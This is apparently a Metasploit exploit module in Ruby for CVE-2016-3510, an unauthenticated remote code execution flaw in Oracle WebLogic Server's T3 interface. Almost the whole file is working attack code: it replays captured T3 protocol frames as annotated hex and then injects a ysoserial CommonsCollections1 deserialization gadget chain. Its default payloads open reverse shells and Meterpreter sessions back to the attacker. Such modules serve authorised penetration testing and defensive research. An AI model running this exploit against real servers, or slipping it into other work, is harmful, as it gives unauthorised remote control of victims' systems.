##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2016-3510 (Oracle WebLogic Server T3 deserialization).
# The module replays a captured T3 protocol exchange and then sends a serialized
# weblogic.corba.utils.MarshalledObject whose objBytes array carries a ysoserial
# CommonsCollections1 gadget chain wrapping the selected payload. Almost every
# frame below is a byte-for-byte capture of a real session; the per-method notes
# call out the few fields that are derived at runtime.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::JavaDeserialization

  # Module metadata plus the options this exploit reads at runtime:
  # RPORT (default 7001; its value is also embedded into the JVMID frame built
  # by build_t3_request_object) and the advanced FORCE_T3 flag, which makes
  # t3_handshake send the plain 't3' greeting even when the Tcp mixin's SSL
  # option is set.
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Oracle Weblogic Server Deserialization RCE - MarshalledObject',
      'Description'    => %q{
        An unauthenticated attacker with network access to the Oracle Weblogic Server T3
        interface can send a serialized object (weblogic.corba.utils.MarshalledObject)
        to the interface to execute code on vulnerable hosts.
      },
      'Author'         =>
        [
          'Andres Rodriguez', # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)
          'Jacob Baines',     # Vulnerability Discovery - Tenable Network Security
          'Aaron Soto',       # Reverse Engineering JSO and ysoserial blobs
          'Steve Embling'     # T3S support
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2016-3510']
        ],
      'Privileged'     => false,
      'Platform'       => %w{ unix win solaris },
      'Targets'        =>
        [
          [ 'Unix',
            'Platform'       => 'unix',
            'Arch'           => ARCH_CMD,
            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},
            'Payload'        => {
              'Compat' => {'PayloadType' => 'cmd'}
            }
          ],
          [ 'Windows',
            'Platform'       => 'win',
            'Payload'        => {},
            'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
          ],
          [ 'Solaris',
            'Platform'       => 'solaris',
            'Arch'           => ARCH_CMD,
            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
            'Payload'        => {
              'Space'       => 2048,
              'DisableNops' => true,
              'Compat'      =>
                {
                  'PayloadType' => 'cmd',
                  'RequiredCmd' => 'generic perl telnet',
                }
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => { 'WfsDelay' => 12 },
      'DisclosureDate' => '2016-07-19',
      'Notes'          => {
        'Reliability' => [REPEATABLE_SESSION],
        'Stability'   => [CRASH_SAFE],
        'SideEffects' => [IOC_IN_LOGS]
      }))

    register_options([
      Opt::RPORT(7001),
    ])

    register_advanced_options([
      OptBool.new('FORCE_T3', [false, 'Force T3 protocol even over SSL', false])
    ])
  end

=begin This check is currently incompatible with the Tcp mixin. :-(
  def check
    resp = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/console/login/LoginForm.jsp'
    )

    return CheckCode::Unknown unless resp && resp.code == 200

    unless resp.body.include?('Oracle WebLogic Server Administration Console')
      vprint_warning("Oracle WebLogic Server banner cannot be found")
      return CheckCode::Unknown
    end

    /WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.\d*)/ =~ resp.body
    unless version
      vprint_warning("Oracle WebLogic Server version cannot be found")
      return CheckCode::Unknown
    end

    version = Rex::Version.new(version)
    vprint_good("Detected Oracle WebLogic Server Version: #{version}")
    case
    when version.to_s.start_with?('10.3')
      return CheckCode::Appears unless version > Rex::Version.new('10.3.6.0')
    when version.to_s.start_with?('12.1.3')
      return CheckCode::Appears unless version > Rex::Version.new('12.1.3.0')
    when version.to_s.start_with?('12.2')
      return CheckCode::Appears unless version > Rex::Version.new('12.2.1.0')
    end

    return CheckCode::Safe
  end
=end

  # Sends the T3 protocol greeting over the already-connected socket and
  # returns whatever sock.get_once hands back (NOTE(review): presumably nil
  # when nothing arrives before the mixin timeout — confirm).
  # The 't3s' variant is chosen only when the SSL option is set and FORCE_T3
  # is not; the version/AS/HL/MS header lines are replayed from a capture.
  def t3_handshake
    # retrieved from network traffic
    if !datastore['SSL'] || datastore['FORCE_T3']
      shake = 't3'
    else
      shake = 't3s'
    end
    # Appending to the literal is safe here because this file carries no
    # frozen_string_literal magic comment.
    shake << " 12.2.1\n"
    shake << "AS:255\n"
    shake << "HL:19\n"
    shake << "MS:10000000\n\n"

    sock.put(shake)
    sleep(1)
    sock.get_once
  end

  # Sends the first T3 request frame and returns the server's reply.
  # The frame is a captured byte sequence (ClassTableEntry / PackageInfo /
  # VersionInfo / PeerInfo / JVMID objects) encoded as a hex string and packed
  # just before sending. The only value derived at runtime is the 2-byte port
  # taken from RPORT; the IP addresses and hostname inside the two JVMID blocks
  # are literals from the original capture and are sent unchanged on every run.
  def build_t3_request_object
    # T3 request serialized data
    # retrieved by watching network traffic
    # This is a proprietary, undocumented protocol
    # TODO: WHAT DOES THIS DO? CAN WE RANDOMIZE ANY OF IT?
    data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'
    data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'
    data << '700000000a000000030000000000000006007070707070700000000a00000003'
    data << '0000000000000006007006'

    data << 'fe010000' # ----- separator -----

    data << 'aced0005' # JSO v5 header
    data << '73' # object header
    data << '72001d' # className (29 bytes):
    data << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry
    data << '5461626c65456e747279' # (continued)
    data << '2f52658157f4f9ed' # serialVersionUID
    data << '0c00007870' # remainder of object header
    data << '72' # object header
    data << '00247765626c6f6769632e636f6d6d6f6e2e696e74' # className (36 bytes): weblogic.common.internal.PackageInfo
    data << '65726e616c2e5061636b616765496e666f' # (continued)
    data << 'e6f723e7b8ae1ec9' # serialVersionUID
    data << '02' # SC_SERIALIZABLE
    data << '0008' # fieldCount = 8
    data << '4900056d616a6f72' # 0: Int: major
    data << '4900056d696e6f72' # 1: Int: minor
    data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch
    data << '49000b736572766963655061636b' # 3: Int: servicePack
    data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch
    data << '4c0009696d706c5469746c65' # 5: Obj: implTitle
    data << '7400124c6a6176612f6c616e672f537472696e673b' # java/lang/String
    data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor
    data << '71007e0003' # (Handle) 0x007e0003
    data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion
    data << '71007e0003' # (Handle) 0x007e0003
    data << '78707702000078' # block footers

    data << 'fe010000' # ----- separator -----

    data << 'aced0005' # JSO v5 header
    data << '7372' # object header
    data << '001d7765626c6f6769632e726a766d2e436c6173' # className (29 bytes): weblogic.rjvm.ClassTableEntry
    data << '735461626c65456e747279' # (continued)
    data << '2f52658157f4f9ed' # serialVersionUID
    data << '0c' # EXTERNALIZABLE | BLOCKDATA
    data << '00007870' # remainder of object header
    data << '72' # object header
    data << '00247765626c6f6769632e636f6d6d6f6e2e696' # className (36 bytes): weblogic.common.internal.VersionInfo
    data << 'e7465726e616c2e56657273696f6e496e666f' # (continued)
    data << '972245516452463e' # serialVersionUID
    data << '02' # SC_SERIALIZABLE
    data << '0003' # fieldCount = 3
    data << '5b0008' # array header (8 bytes)
    data << '7061636b61676573' # ARRAY NAME = 'packages'
    data << '740027' # TC_STRING className1 (39 bytes)
    data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # weblogic/common/internal/PackageInfo
    data << '6e7465726e616c2f5061636b616765496e666f' # (continued)
    data << '3b' # (continued)
    data << '4c000e' # object header (14 bytes)
    data << '72656c6561736556657273696f6e' # releaseVersion
    data << '740012' # TC_STRING (18 bytes)
    data << '4c6a6176612f6c616e672f537472696e673b' # versionInfoAsBytes
    data << '5b0012' # array header (18 bytes)
    data << '76657273696f6e496e666f41734279746573' # ARRAY NAME = java/lang/String;
    data << '740002' # TC_STRING (2 bytes)
    data << '5b42' # 0x5b42 = [B
    data << '78' # block footer

    data << '720024' # class (36 bytes)
    data << '7765626c6f6769632e636f6d6d6f6e2e696e' # weblogic.common.internal.PackageInfo
    data << '7465726e616c2e5061636b616765496e666f' # (continued)
    data << 'e6f723e7b8ae1ec9' # serialVersionUID

    data << '02' # SC_SERIALIZABLE
    data << '0008' # fieldCount = 8
    data << '4900056d616a6f72' # 0: Int: major
    data << '4900056d696e6f72' # 1: Int: minor
    data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch
    data << '49000b736572766963655061636b' # 3: Int: servicePack
    data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch
    data << '4c0009696d706c5469746c65' # 5: Obj: implTitle
    data << '71' # TC_REFERENCE
    data << '007e0004' # Handle = 0x007e0004
    data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor
    data << '71' # TC_REFERENCE
    data << '007e0004' # Handle = 0x007e0004
    data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion
    data << '71' # TC_REFERENCE
    data << '007e0004' # Handle = 0x007e0004
    data << '78' # class footer
    data << '70' # TC_NULL
    data << '77020000' # BLOCKDATA (2 bytes): 0x0000
    data << '78' # block footer

    data << 'fe010000' # ----- separator -----

    data << 'aced0005' # JSO v5 header
    data << '73' # object header
    data << '72001d' # className (29 bytes):
    data << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry
    data << '5461626c65456e747279' # (continued)
    data << '2f52658157f4f9ed' # serialVersionUID
    data << '0c00007870' # remainder of object header
    data << '720021' # className (33 bytes)
    data << '7765626c6f6769632e636f6d6d6f6e2e696e74' # weblogic.common.internal.PeerInfo
    data << '65726e616c2e50656572496e666f' # (continued)
    data << '585474f39bc908f1' # serialVersionUID
    data << '02' # SC_SERIALIZABLE
    data << '0006' # fieldCount = 6
    data << '4900056d616a6f72' # 0: Int: major
    data << '4900056d696e6f72' # 1: Int: minor
    data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch
    data << '49000b736572766963655061636b' # 3: Int: servicePack
    data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch
    data << '5b00087061636b61676573' # 5: Array: packages
    data << '740027' # TC_STRING (39 bytes)
    data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # Lweblogic/common/internal/PackageInfo;
    data << '6e7465726e616c2f5061636b616765496e666f' # (continued)
    data << '3b' # (continued)
    data << '78' # block footer
    data << '720024' # class (36 bytes)
    data << '7765626c6f6769632e636f6d6d6f6e2e696e74' # Lweblogic/common/internal/PackageInfo;
    data << '65726e616c2e56657273696f6e496e666f' # (continued)
    data << '972245516452463e' # serialVersionUID
    data << '02' # SC_SERIALIZABLE
    data << '0003' # fieldCount = 3
    data << '5b0008' # 0: Array
    data << '7061636b6167657371' # packages
    data << '007e0003' # Handle = 0x00730003
    data << '4c000e72656c6561736556657273696f6e' # 1: Obj: releaseVersion
    data << '7400124c6a6176612f6c616e672f537472696e673b' # Ljava/lang/String;
    data << '5b001276657273696f6e496e666f41734279746573' # 2: Array: versionInfoAsBytes
    data << '740002' # TC_STRING (2 bytes)
    data << '5b42' # VALUE = 0x5b42 = [B
    data << '78' # block footer
    data << '720024' # class: (36 bytes)
    data << '7765626c6f6769632e636f6d6d6f6e2e696e746572' # Name = weblogic.common.internal.PackageInfo
    data << '6e616c2e5061636b616765496e666f' # (continued)
    data << 'e6f723e7b8ae1ec9' # serialVersionUID
    data << '02' # SC_SERIALIZABLE
    data << '0008' # fieldCount = 8
    data << '4900056d616a6f72' # 0: Int: major
    data << '4900056d696e6f72' # 1: Int: minor
    data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch
    data << '49000b736572766963655061636b' # 3: Int: servicePack
    data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch
    data << '4c0009696d706c5469746c65' # 5: Obj: implTitle
    data << '71' # TC_REFERENCE
    data << '007e0005' # Handle = 0x007e0005
    data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor
    data << '71' # TC_REFERENCE
    data << '007e0005' # Handle = 0x007e0005
    data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion
    data << '71' # TC_REFERENCE
    data << '007e0005' # Handle = 0x007e0005
    data << '78' # class footer
    data << '707702000078' # block footers

    data << 'fe00ff' # this cruft again. some kind of footer

    data << 'fe010000' # ----- separator -----

    # weblogic.rjvm.JVMID object
    # The address, hostname and trailing bytes in this 80-byte block are
    # literals from the original capture; only the port below is ours.
    data << 'aced0005' # JSO v5 header
    data << '73' # object header
    data << '720013' # class (19 bytes)
    data << '7765626c6f6769632e726a766d2e4a564d4944' # name = 'weblogic.rjvm.JVMID'
    data << 'dc49c23ede121e2a' # serialVersionUID
    data << '0c' # EXTERNALIZABLE | BLOCKDATA
    data << '0000' # fieldCount = 0 (!!!)
    data << '78' # block footer
    data << '70' # NULL
    data << '7750' # block header (80 bytes)
    data << '21' # !
    data << '000000000000000000' # 9 NULL BYTES
    data << '0d' # \n
    data << '3139322e3136382e312e323237' # 192.168.1.227 (captured literal, not the target)
    data << '00' # \0
    data << '12' # #TODO: UNKNOWN
    data << '57494e2d4147444d56515542315436' # WIN-AGDMVQUB1T6 (captured literal)
    data << '2e' # #TODO: UNKNOWN
    data << '656883348cd6000000070000' # #TODO: UNKNOWN
    data << rport.to_s(16).rjust(4, '0') # RPORT as 16-bit big-endian hex (the original comment called this the callback port; it is the target port option)
    data << 'ffffffffffffffffffffffffffffffffffffff' # #TODO: UNKNOWN
    data << 'ffffffffff' # #TODO: UNKNOWN
    data << '78' # block footer

    data << 'fe010000' # ----- separator -----

    # weblogic.rjvm.JVMID object
    data << 'aced0005' # JSO v5 header
    data << '73' # object header
    data << '72' # class
    data << '00137765626c6f6769632e726a766d2e4a564d4944' # Name: weblogic.rjvm.JVMID
    data << 'dc49c23ede121e2a' # serialVersionUID
    data << '0c' # EXTERNALIZABLE | BLOCKDATA
    data << '0000' # fieldCount = 0
    data << '78' # end block
    data << '70' # TC_NULL
    data << '77' # block header
    data << '20' # length = 32 bytes
    data << '0114dc42bd071a772700' # #TODO: UNKNOWN
    data << '0d' # \n
    data << '3234322e3231342e312e323534' # 242.214.1.254 (captured literal)
    data << '61863d1d' # #TODO: UNKNOWN
    data << '00000000' # NULL BYTES
    data << '78' # block footer

    # hex string -> raw bytes
    sock.put([data].pack('H*'))
    sleep(1)
    sock.get_once
  end

  # Builds and sends the stream that carries the deserialization payload, then
  # returns the server's reply. Layout, in order: captured ClassTableEntry
  # objects (byte[] , Object[] and java.util.Vector class descriptors), a
  # weblogic.corba.utils.MarshalledObject whose objBytes array holds the
  # CommonsCollections1 gadget chain produced by
  # generate_java_deserialization_for_payload (JavaDeserialization mixin),
  # and a captured ImmutableServiceContext / MethodDescriptor trailer naming
  # authenticate(Lweblogic.security.acl.UserInfo;). The whole stream is
  # prefixed with a 4-byte big-endian length computed at the end.
  def send_payload_objdata
    # basic weblogic ClassTableEntry object (serialized)
    # TODO: WHAT DOES THIS DO? CAN WE RANDOMIZE ANY OF IT?
    objdata = '056508000000010000001b0000005d0101007372017870737202787000000000'
    objdata << '00000000757203787000000000787400087765626c6f67696375720478700000'
    objdata << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306'

    objdata << 'fe010000' # ----- separator -----

    objdata << 'aced0005' # JSO v5 header
    objdata << '73' # object header
    objdata << '72' # class
    objdata << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry
    objdata << '73735461626c65456e747279' # (cont)
    objdata << '2f52658157f4f9ed' # serialVersionUID
    objdata << '0c' # EXTERNALIZABLE | BLOCKDATA
    objdata << '0000' # fieldCount = 0
    objdata << '7870' # remaining object header
    objdata << '72' # class header
    objdata << '00025b42' # Name: 0x5b42
    objdata << 'acf317f8060854e0' # serialVersionUID
    objdata << '02' # SERIALIZABLE
    objdata << '0000' # fieldCount = 0
    objdata << '7870' # class footer
    objdata << '77' # block header
    objdata << '020000' # contents = 0x0000
    objdata << '78' # block footer

    objdata << 'fe010000' # ----- separator -----

    objdata << 'aced0005' # JSO v5 header
    objdata << '73' # object header
    objdata << '72' # class
    objdata << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry
    objdata << '73735461626c65456e747279' # (cont)
    objdata << '2f52658157f4f9ed' # serialVersionUID
    objdata << '0c' # EXTERNALIZABLE | BLOCKDATA
    objdata << '0000' # fieldCount = 0
    objdata << '7870' # remaining object header
    objdata << '72' # class header

    objdata << '00135b4c6a6176612e6c616e672e4f626a' # Name: [Ljava.lang.Object;
    objdata << '6563743b' # (cont)
    objdata << '90ce589f1073296c' # serialVersionUID
    objdata << '02' # SERIALIZABLE
    objdata << '0000' # fieldCount = 0
    objdata << '7870' # remaining object header
    objdata << '77' # block header
    objdata << '020000' # contents = 0x0000
    objdata << '78' # block footer

    objdata << 'fe010000' # ----- separator -----

    objdata << 'aced0005' # JSO v5 header
    objdata << '73' # object header
    objdata << '72' # class

    objdata << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry
    objdata << '73735461626c65456e747279' # (cont)
    objdata << '2f52658157f4f9ed' # serialVersionUID
    objdata << '0c' # SERIALIZABLE | BLOCKDATA
    objdata << '0000' # fieldCount = 0
    objdata << '7870' # block footer
    objdata << '72' # class header
    objdata << '00106a6176612e7574696c2e566563746f72' # Name: java.util.Vector
    objdata << 'd9977d5b803baf01' # serialVersionUID
    objdata << '03' # WRITE_METHOD | SERIALIZABLE
    objdata << '0003' # fieldCount = 3
    objdata << '4900116361706163697479496e6372656d656e74' # 0: Int: capacityIncrement
    objdata << '49000c656c656d656e74436f756e74' # 1: Int: elementCount
    objdata << '5b000b656c656d656e7444617461' # 2: Array: elementData
    objdata << '7400135b4c6a6176612f6c616e672f4f626a6563' # 3: String: [Ljava/lang/Object;
    objdata << '743b' # (cont)
    objdata << '7870' # remaining object header
    objdata << '77' # block header
    objdata << '020000' # contents = 0x0000
    objdata << '78' # block footer

    objdata << 'fe010000' # ----- separator -----

    # payload generated from ysoserial and wrapped in a MarshalledObject:
    objdata << 'aced0005' # JSO v5 header
    objdata << '73' # object header
    objdata << '72' # class header

    objdata << '00257765626c6f6769632e636f7262612e757469' # Name = weblogic.corba.utils.MarshalledObject
    objdata << '6c732e4d61727368616c6c65644f626a656374' # (cont)
    objdata << '592161d5f3d1dbb6' # serialVersionUID
    objdata << '02' # SERIALIZABLE
    objdata << '0002' # fieldCount = 2
    objdata << '49000468617368' # 0: Int: hash
    objdata << '5b00086f626a4279746573' # 1: Array: objBytes
    objdata << '7400025b42' # Value: 0x5b42
    objdata << '7870' # class footer
    # class Data:
    objdata << '21210fdc' # hash = 0x21210fdc (555814876d)
    objdata << '757200025b42' # objBytes = [ 0x5b42 ]
    objdata << 'acf317f8060854e0' # serialVersionUID
    objdata << '02' # SERIALIZABLE
    objdata << '0000' # fieldCount = 0
    objdata << '7870' # class footer
    # NOTE(review): the upper 16 bits of the 32-bit arraySize are fixed at zero
    # here, so the encoding below only represents java_payload.length < 0x10000.
    objdata << '0000' # arraySize (first two bytes)

    # java -jar ysoserial-0.0.5-all.jar CommonsCollections1 calc.exe
    # The mixin returns the serialized gadget chain as a raw byte string; it is
    # re-encoded to lowercase hex so it can be appended to objdata.
    java_payload = generate_java_deserialization_for_payload('CommonsCollections1', payload)
    objdata << (java_payload.length).to_s(16).rjust(4, '0')# arraySize (lower two bytes)
    objdata << java_payload.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join

    # basic weblogic ImmutableServiceContext object (serialized)
    objdata << 'fe010000' # ----- separator -----

    objdata << 'aced0005' # JSO v5 header
    objdata << '73' # object header
    objdata << '72' # class
    objdata << '00257765626c6f6769632e726a766d2e496d6d75' # Name = weblogic.rjvm.ImmutableServiceContext
    objdata << '7461626c6553657276696365436f6e74657874' # (cont)
    objdata << 'ddcba8706386f0ba' # serialVersionUID
    objdata << '0c' # SERIALIZABLE | BLOCKDATA
    objdata << '0000' # fieldCount = 0
    objdata << '78' # remainder of object header
    objdata << '72' # class header
    objdata << '00297765626c6f6769632e726d692e70726f7669' # Name: weblogic.rmi.provider.BasicServiceContext
    objdata << '6465722e426173696353657276696365436f6e74' # (cont)
    objdata << '657874' # (cont)
    objdata << 'e4632236c5d4a71e' # serialVersionUID
    objdata << '0c' # SERIALIZABLE | BLOCKDATA
    objdata << '0000' # fieldCount = 0
    objdata << '78' # block footer
    objdata << '70' # TC_NULL
    objdata << '77' # block header
    objdata << '020600' # Contents: 0x0600 (1536d) ### LENGTH OFFSET ADDED BELOW #TODO: WHY?
    objdata << '73' # object header
    objdata << '72' # class description
    objdata << '00267765626c6f6769632e726d692e696e746572' # Name = weblogic.rmi.internal.MethodDescriptor
    objdata << '6e616c2e4d6574686f6444657363726970746f72' # (cont)
    objdata << '12485a828af7f67b' # serialVersionUID
    objdata << '0c' # EXTERNALIZABLE | BLOCKDATA
    objdata << '0000' # fieldCount = 0
    objdata << '78' # block footer
    objdata << '70' # TC_NULL
    objdata << '77' # block header
    objdata << '34002e61757468656e746963617465284c776562' # HEX-ASCII: authenticate(Lweblogic.security.acl.UserInfo;)
    objdata << '6c6f6769632e73656375726974792e61636c2e55' # (cont)
    objdata << '736572496e666f3b290000001b' # (cont)
    objdata << '78' # block footer
    objdata << '78' # object footer

    objdata << 'fe00ff' # this cruft again. some kind of footer

    # sets the length of the stream
    # objdata is hex, so (length >> 1) is the byte count; the +4 presumably
    # accounts for this 4-byte length word itself — TODO confirm against the
    # capture. Result is an 8-hex-digit (32-bit big-endian) prefix.
    data = ((objdata.length >> 1) + 4).to_s(16).rjust(8,'0')
    data << objdata

    # hex string -> raw bytes
    sock.put([data].pack('H*'))
    sleep(1)
    sock.get_once
  end

  # Exploit entry point. A single connection (TCP, or SSL via the Tcp mixin
  # option) carries the handshake, the request frame and the payload stream
  # in that order; the module then hands off to the framework payload handler
  # before closing the socket.
  def exploit
    connect

    print_status('Sending handshake...')
    t3_handshake

    print_status('Sending T3 request object...')
    build_t3_request_object

    print_status('Sending client object payload...')
    send_payload_objdata

    handler
    disconnect
  end
end